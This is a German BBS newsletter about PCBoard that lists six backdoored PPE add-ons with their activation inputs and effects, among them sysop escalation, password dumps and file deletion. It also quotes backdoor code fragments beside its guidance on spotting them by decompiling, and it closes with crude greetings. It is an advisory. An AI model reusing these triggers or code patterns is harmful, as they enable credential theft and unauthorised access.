PC BOARD NEWSLETTER

EIN TEXT VON Bad Peon






-1. VORWORT

Moin!
Wir haben uns gedacht, wir bringen mal n paar Infos über Backdoors in PPEs und über die Zukunft von PC Board bzw. die des Herstellers Clark Development Company (CDC) selbst, damit ihr auch wisst, was Sache ist.



0. INHALTSVERZEICHNIS


-1.VORWORTBla
 0.INHALTSVERZEICHNISHä?!
 1.BACKDOORS IN PPESSechs konkrete Beispiele
 2.WIE MAN SICH VOR BACKDOORS SCHÜTZTErkennen und vernichten!
 3.EIN AUSBLICK IN DIE ZUKUNFTPPLC 3.40 suckt!
 4.WAS IST MIT CDC LOS?Haste ma ne Mark?
 5.DIES UND DAS UND IRGENDWASGreetings und Welteroberungspläne


1. BACKDOORS IN PPES


  Aja... diese Beispiele sind nicht alle 100% aktuell, aber die meisten
  Sysops werfen PPEs nicht einfach weg, bloss weil sie alt sind... es ist
  also gut möglich, dass der einer oder andere seit Monaten in seinem
  Board PPEs mit Backdoors laufen hat... :)


  TITEL       : Intense Flag vO.8
  GROUP       : CIA - Creators of Insane Art
  ARCHIVNAME  : CIAFLG08.ZIP
  PPE-FILENAME: IFLAG.PPE
  HERKUNFT    : N/A
  FILE_ID.DIZ :
         .c!a.        ÜÜÜÜ               ÜßßÜ
             ÜÜÜ    ÜÜß           ß    ßß
        ÜÜÜßÜ   ß۲ß  ÜÜÜÜÜ   Ü    ß
         ß ÜÜ Ü   ßß     ßß޲Ü   *  ß
         XXßßßß  Üß     ß     Ü
        Ü ݰ Ü۲ÜÜ ßÜÜ ÜÜ۲ ÜÜÜ ޲
         ßÜ  ß ßÜ ß ß ۲ß
            ßßÜßß ßß ßÜßÜ *Ü ß
        Ü*ß Ü      ÜÜÜ ÜÜÜ ßßßßß      Ü
            * Ü  Ü۲ß     ßßß۲Ü      Ü*ß   ß
         ß ß    ßßß   .    .    ßßß ß    *Ü ß
       [===(07/15/95)=============================]
          Intense Flag vO.8 by Dark Jester [PPE]
        For PCB 15.21+ ONLY!  A NEW FLAG PPE more
              like the PiPELiNE interface!

  Aktivierung durch: Eingabe von "iA!"
  Effekt           : Gibt dem User Sysop-Security.



  TITEL       : Press Enter.PPE
  GROUP       : DC - Dark Community
  ARCHIVNAME  : DC-ENTER.ZIP
  PPE-FILENAME: ENTER.PPE
  HERKUNFT    : Ultra lame, also wahrscheinlich von den Autoren selbst.
  FILE_ID.DIZ :
       +++DARK  COMMUNITY+++
       |  PRESS ENTER.PPE  |
       | IMPORTANT FOR ALL |
       | SYSOPS!!!         |
       | READ DC.NFO FILE  |
       | TO GET A PRESENT  |
       |-------------------|
       |    [05/03/97]     |

  Aktivierung durch: Eingabe von "!"
  Effekt           : Gibt die Namen und Passwörter der ersten zehn Benutzer
                     des Sytems (also u.a. auch des Sysops) ans Modem aus,
                     nicht aber an den lokalen Screen!



  TITEL       : Menu Command
  GROUP       : A.R Team
  ARCHIVNAME  : N/A
  PPE-FILENAME: MPROMPT.PPE
  HERKUNFT    : Anscheinend gerippt, mit Backdoor versehen und rereleaset.
  FILE_ID.DIZ :
         A GREAT NEW PPE FROM A.R TEAM
         MENU COMMAND! FADING, PALETTE  
         CHANGING, DELAY CFG.. 100% CFG!
         GREAT NEW PPE !!! TAKE'T NOW!

  Aktivierung durch: Eingabe von "FFF1"
  Effekt           : Gibt dem User Sysop-Security.



  TITEL       : Energy Meter Logoff Prompt
  GROUP       : Ako/Cpc ??
  ARCHIVNAME  : WAVLOGOF.ZIP
  PPE-FILENAME: WAVLOGOF.PPE
  HERKUNFT    : Ultra lame, also wahrscheinlich von den Autoren selbst.
  FILE_ID.DIZ :
       -*  ENERGY METER LOGOFF PROMPT    --ͻ
       PPE- To Replace the Cheesy PCB default
       "Proceed with logoff" prompt. This has
       LIGHT BAR and COOL ANIMATIONS (which is
       rare in PPEs) this is a MUST TRY!!!!  
       --PeeHS KcaLB [01/04/96] =AKo= -

  Aktivierung durch: Drücken von "*" nach dem Wählen von "USE RESERVES".
  Effekt           : Gibt dem User Userlevel 110 (Standartvorgabe für
                     Sysoplevel). Das funktioniert nur, wenn es im PWRD-
                     File diesen Userlevel auch gibt.



  TITEL       : Protocol Select Replacement
  GROUP       :
Gilden
  ARCHIVNAME  : N/A
  PPE-FILENAME: N/A
  HERKUNFT    : Fake: einfach Version v2.0 mit nem Backdoor drin.
  FILE_ID.DIZ :
        -*( PROTOCOL SELECT  REPLACEMENT )*-
       -- Ü -- ßßßÜ ---
       ÜÜÜÜÜ   
         ß ÜÜÜÜ   
       ÜÜ   
       --- ßßßßßß ßßßßß ßßßßßßßß --ͼ

         *NiCE CURSOR iNTERFACE
         *FULLY CONFiGURABLE         (v2.1)
         *MiNOR BUGFiX         (PANDUR/GLD)
        -----------------(13/o1/96)--

  Aktivierung durch: N/A
  Effekt           : Gibt dem User Sysop-Security.



  TITEL       : Oneliner v.1
  GROUP       : Independent: Black Night
  ARCHIVNAME  : BK-ONEL.ZIP oder BK!ONEL.ZIP
  PPE-FILENAME: ONELINER.PPE
  HERKUNFT    : Ein Fake, der NICHT von Black Night stammt.
                Entdeckt von The Mighty SCI!, Cyz und Co.
  FILE_ID.DIZ :
       ßßßßßßßßßßßßßßßßßßßßßßßßß
       ß ß ß
       ÜÜÜ ÜÜÜ ßßß  
       ßßßßßßß ßßß ßßß ßßßßßßß
               LiNeR V.1        
       ßßßßßßßßßßßßßßßßßßßßßßßßß
      
       CODEDBYBLACKKNIGHT
       ÜßÜÜßÜÜßÜßÜßÜßÜÜßÜßÜßÜßÜ

  Ein echtes "Meisterwerk", über das wir schon einmal berichtet haben (in
  UE-00074), aber mittlerweile haben wir genauere Infos darüber. Diese PPE
  enthält gleich mehrere Backdoors:

  1.
  Aktivierung durch: Starten der PPE
  Effekt           : Kopiert die Userbase und moved sie unter drei anderen
                     Namen (THCHNO.ZIP, THBSHTBV.TXT, JANK.ZIP) ins Down-
                     load-Verzeichnis der Main Board-Konferenz und trägt
                     sie auch gleich in die Downloadliste ein.
                     Zum downloaden muss man "flag [name]" tippen, weil die
                     Files ja nicht in den Filelisten landen.

  2.
  Aktivierung durch: Location des Users ist "bye bye".
  Effekt           : Löscht folgende Files:
                      c:\autoexec.bat
                      c:\autoexec.bak
                      c:\config.sys
                      c:\config.sys    Ein Bug :)
                      c:\command.com
                      c:\dos\command.com
                     Die folgenden Files werden auch gleich aufgespürt und
                     selbstverständlich ebenfalls gekillt:
                      USERS
                      CNAMES
                      DLPATHS.LST (der Main Board-Konferenz)
                      PCBOARD.DAT
                     Achja... da hier das DELETE-Kommando von PC Board be-
                     nutzt wird, sollte es nicht weiter schwer sein, diese
                     Files mittels einer Bootdiskette und UNDELETE wieder-
                     herzustellen. Übringens wird das DELETE-Kommando NICHT
                     von PPLX 2.00 angekreidet!

  3.
  Aktivierung durch: Location des Users ist "chicken man".
  Effekt           : Gibt dem User Sysop-Security.

  4.
  Aktivierung durch: In Zeile 32 von ONELINER.CFG steht "backdoor off".
  Effekt           : Löscht die drei Kopien der Userbase wieder.



  So... wie wir gesehen haben, werden Backdoors für gewöhnlich durch Ein-
  gaben des Users aktiviert und dienen zum Erreichen der höchstmöglichen
  Userlevels bzw. zum Zugriff auf fremde (bessere) Accounts.




2. WIE MAN SICH VOR BACKDOORS SCHÜTZT


Man dekompiliert einfach die fragwürdige PPE mit PPLX 2.00 und achtet dabei auf die "Decompiling Flags", die PPLX vergibt, wenn bestimmte verdächtige Funktionen in einer PPE vorkommen. Dann sieht man sich das erzeugte PPX-File an und scrollt erst mal ganz an den Schluss, wo die Flags mit ihren Erklärungen stehen. Anschliesend sucht man (vom Anfang des Files an!) nach den Statements, die PPLX dort aufgeführt hat.

Sollte ein U_PWD bemängelt worden sein, sucht man danach; wenn davor ein 'GetUser' steht ist es (meistens) harmlos, da es nur das Password des derzeitigen Users enthält. Steht davor allerdings ein 'GetAltUser', so liest die PPE das Passwort/die Passwörter anderer User.

Ein Beispiel aus der WAVLOGOF.PPE:

  For INTEGER004 = 1 To 10
  GetAltUser INTEGER004
  MPrintLn
  MPrint "@POFF@"
  MPrintLn U_Name()
  MPrintLn U_Pwd
  MPrintLn
  Next

For/Next sorgt dafür, dass alles, was dazwischen steht, mit jedem INTEGER004 von 1 bis 10 abgearbeitet wird. In diesem Fall werden also die Daten des Users Nummer 1-10 geladen, eine Leerzeile wird ans Modem geschickt (wir wollen ja schliesslich auch komfortable und ordentlich aussehende Backdoors!), dann wird das More?-Prompt deaktiviert (einmal hätte auch gereicht, müsste nicht in der Schleife stehen), dann wird der Name des Users ausgeben, dann sein Passwort und eine weitere Leerzeile später geht das ganze mit dem nächsten User weiter.

Ein User, der dieses Backdoor benutzt, sieht dann etwa folgendes:

  BAD PEON
  ASDFLKHSDMYVCOI


  THE MIGHTY SCI
  7328984a7w876


  OMEN
  LINUXRULES


  M0!
  S*D.S}8ßFS^-D%F!/&|%S(SD=ä,S'D54S$D#_*2`sJDÄß;)ü?[Ü@A

  (usw., hab hier keinen Bock 40 Zeilen für ein Beispiel zu opfern)


Ein PUTUSER bedeutet, dass die Userdaten des derzeitigen Users neu geschrieben werden, d.h. in der Regel verändert wurden. Hierbei sollte man nach einem U_SEC suchen, dass vor einem = steht, wie z.B. in dieser Zeilenfolge aus der WAVLOGOF.PPE:

  GetUser
  U_Sec = 110
  PutUser

GetUser liest die Userdaten, U_Sec = 110 setzt den Userlevel auf 110 und PutUser speichert dann die Userdaten. Ob der User in diesem Fall tatsächlich Sysop-Privilegien geniest hängt davon ab, ob der Sysop die voreingestellten Werte für die Sysop-Funktionen hochgesetzt hat oder nicht, aber die meisten Sysops arbeiten einfach mit der Standart-Konfiguration von PC Board... selber schuld!

Wenn es in dem Board gar keinen Userlevel 110 gibt, dann gibt PC Board nur eine Fehlermeldung aus und schreibt die Userdaten gar nicht erst in die Userbase.

Bessere Backdoors sehen da eher so aus (IFLAG.PPE):

  GetUser
  U_Sec = ReadLine(PCBDat(), 16)
  PutUser

Hier wird der neue Userlevel des Users auf den Wert gesetzt, der in der PCBOARD.DAT in der Zeile 16 vermerkt ist, und das ist genau der Wert, der zur "Users File Maintainance" erforderlich, also bei jedem halbwegs vernünftigen Sysop der höchste Userlevel überhaupt (damit kann man Userdaten ausspähen und verändern). Daher wird diese PPE dem User in jedem Board den maximalen Userlevel geben, auch wenn der Sysop die Konfiguration komplett umgekrempelt hat. Gut nich? :)



3. EIN AUSBLICK IN DIE ZUKUNFT


Mit PC Board 15.4 kommt, wie an den Beta-Versionen zu sehen war, mal wieder eine neue Version von PPLC, nämlich 3.40.

Sie wird natürlich NICHT abwärtskompatibel sein, d.h.: Ältere PC Boards können mit PPEs, die mit PPLC 3.40 kompeliert wurden, nichts anfangen, aber das war ja noch nie so.

Zusätzlich enthält PPLC 3.40 neue Routinen zur Verschlüsselung, die laut CDC das Dekompilieren für immer unmöglich machen werden.

PPEs, die mit PPLC 3.40 kompeliert wurden, können mit KEINEM heute existenten Programm dekompiliert werden! Eine neue Flut von Backdoors rollt also auf uns zu, und wir haben keine Möglichkeit, etwas dagegen zu unternehmen.

Lone Runner^AGS (PPLX) und Chicken^T4F (PPLD) haben damit mal wieder ein hartes Stück Arbeit vor sich... Aber keine Sorge Jungs, ewiger Weltruhm ist euch sicher! ;)

Aber wenn man das ganze (ausnahmsweise) mal von einem objektiven Standpunkt betrachtet, so stellt man fest:

PPEs, die mit PPLC 3.40 kompiliert wurden...
-sind maximal 0.1% kleiner im Vergleich zu PPLC 3.30,
-benötigen länger, um von PC Board entschlüsselt zu werden,
-erzielen wegen der Verschlüsselung noch schlechtere Pack-Raten,
-laufen nur auf PC Board 15.4,
-sind IMMER verdächtig, Backdoors zu enthalten,
-und sind daher ein absolut tödliches Risiko für jeden Sysop!

Daher würde ich es als PPE-Coder nicht für sehr sinnvoll halten, meine PPEs mit PPLC 3.40 zu kompelieren, weil sonst jeder Angst vor einem möglichen Backdoor hat und nichts unternehmen kann, um dieses Risiko zu minimieren.
Deshalb werden bis auf weiters (also etwa bis PPLX/PPLD mit PPLC 3.40 umgehen können) alle PPEs von Underground Empire nicht mit PPLC 3.40 kompeliert!

Wenn ihr eine Underground Empire-PPE findet, die mit PPLC 3.40 kompeliert wurde, die neuer als die übrigen Files im Archiv ist, deren Datum nicht mit dem im -UE-REL-.NFO übereinstimmt oder die sonstwie einen merkwürdigen Eindruck macht, dann installiert es nicht sondern schickt es uns! Bis jetzt sind zwar noch keine gehackten Versionen von UE-PPEs aufgetaucht, aber einmal ist immer das erste mal. ;(


Noch ein Wort zum Dekompilieren im allgemeinen: Ich benutze keine Decompiler-Traps, weil ich finde, dass jeder die Möglichkeit haben sollte, sich den Code einer PPE anzusehen, um herauszufinden, was sie eigentlich so treibt.
Ausserdem kann das Rekompilieren die einzige Möglichkeit sein, die PPE an sein Board anzupassen, falls die Configfiles nicht umfassend genug ausfallen sollten.

Natürlich weiss ich, dass es genug Leute gibt, die sich den Code "einfach so" anschauen bzw. gerade selber eine ähnliche PPE schreiben ;)

Aber was spricht dagegen, sich anzusehen, wie andere Leute ein bestimmtes Problem gelöst haben?? Das ganze hört für mich genau dann auf, wenn ganze Passagen einer dekompilierten PPE in eine neue, "eigene" PPE kopiert und nur noch die Namen der Variablen angepasst werden. Das ist dann nicht mehr Inspiration, sondern dumpfes Abschreiben!

WARUM HAT CDC WAS GEGEN DECOMPILER?
Guckt euch mal die Preisliste von CDC an :) Auch wenn sie ihre Preise erheblich gesenkt haben, so bleibt PC Board ein Profi-Programm, an dem auch andere Firmen etwas verdienen wollen, indem sie z.B. Shareware-PPEs mit eingeschränktem Funktionsumfang rausbringen, die dann sofort gecrackt werden.



4. WAS IST MIT CDC LOS?


Wie wir inzwischen erfahren haben, ist die Firma CDC mittlerweile PLEITE und es sieht so aus, als würden sämtliche Angestellte arbeitslos und der gesamte Firmenbesitz verschachert werden.

Allerdings versucht der harte Kern von CDC, Wege zu finden, um das Geschäft nicht komplett aufgeben zu müssen, da sie mit PC Board Metaworlds ja ein zukunftsträchtiges Programm haben, dass nur deswegen kein Geld bringt, weil es noch nicht 100%ig ausgereift ist und weil CDC schlicht kein Geld hat, um Werbung dafür zu machen.

PC Board selbst lässt sich im Zeitalter der Völkerwanderung ins Internet ja kaum noch verkaufen, CDC hat das zu spät erkannt und daher haben sie jetzt Probleme, zu überleben.

Wir werden trotzdem weiterhin PPEs entwickeln und die meisten Sysops werden auch nicht sofort ihre Boards wegschmeissen, nur weil es in der nächsten Zeit keine Updates mehr für PC Board geben wird... viele Sysops benutzen ja z.B. immer noch PC Board 15.22, obwohl schon 2 neuere Versionen da sind, nämlich 15.3 und 15.4beta.



5. DIES UND DAS UND IRGENDWAS


Ich grüsse:

ACE ARUU, HANDO und THE EXORCIST, die einige Bugs im derzeit laufenden Beta-Test für einige PPEs (u.a. UE!WHO v2.0) gefunden haben, THE MIGHTY SCI, der so nett ist, für die Defizite eines ganz bestimmten Ex-UE-Members einzuspringen, ALLY605, der etwas glücklos ein PC Board mit allem, was man so braucht, laufen hat ohne dass es jemand bemerken würde, JOSEF, dessen "Gilde Szene Beobachter" sich eigentlich nur um uns dreht, CYZ, der es immer noch nicht geschafft hat, mich wieder in sein Board zu lassen, TIGER, der vor Objektivität nur so strotzende UE-Kritiker von VDO, HEADBANGER, von dem ich endlich alle persönlichen Daten habe, FEAR FACTORY, die wohl bald die Charts erstürmen werden, VENOM, ohne die es keinen Trash, Death, Black oder sonstwas-Metal geben würde, SLAYER, die hoffentlich wieder zu ihrer alten Klasse zurückfinden, DOC FRED, dessen Mörder freien Download in allen UE-Boards bekommt, MANIAC, dessen Board total vergammelt, ALLE USER DER WESTERN ALLIANCE, die jeden Upload für eine persönliche Opferung halten, ALLE LAMER DER 09 AREA, die anscheinend aus allen anderen Areas rausgeschmissen wurden, MARIA UND JOSEF, deren Sohn ziemlich kaputt ist und sich für JESUS hält, SUICIDAL SNOWMAN UND WHITE TRASH, die sich pausenlos gegenseitig vergewaltigen und nebenbei noch die gesamte US-ANSI-Szene durch den Dreck ziehen, HGH, die uns immerhin auch mal gegreetet haben und eigentlich ganz ok waren, LORD XEEN, dessen PPEs bis heute unkopiert sind und dessen griechischer Dealer immer noch tot ist, DIR, dass du diesen Schmontz liest und ALLE SYSOPS, dass sie sich auch mal Sorgen um ihre Boardsoftware machen. :)


Noch was:
Wie allgemein zu Vernehmen ist, sind eine ganze Menge Sysops derzeit damit beschäftigt, sehnsüchtig auf einen Nachfolger für die Standart- PPE FLAG.PPE von PWA zu warten... nur noch wenige Monate! Aja genau: Greets an Xtreeman & Synopsis! ;)


CYA... I AM BAD PEON!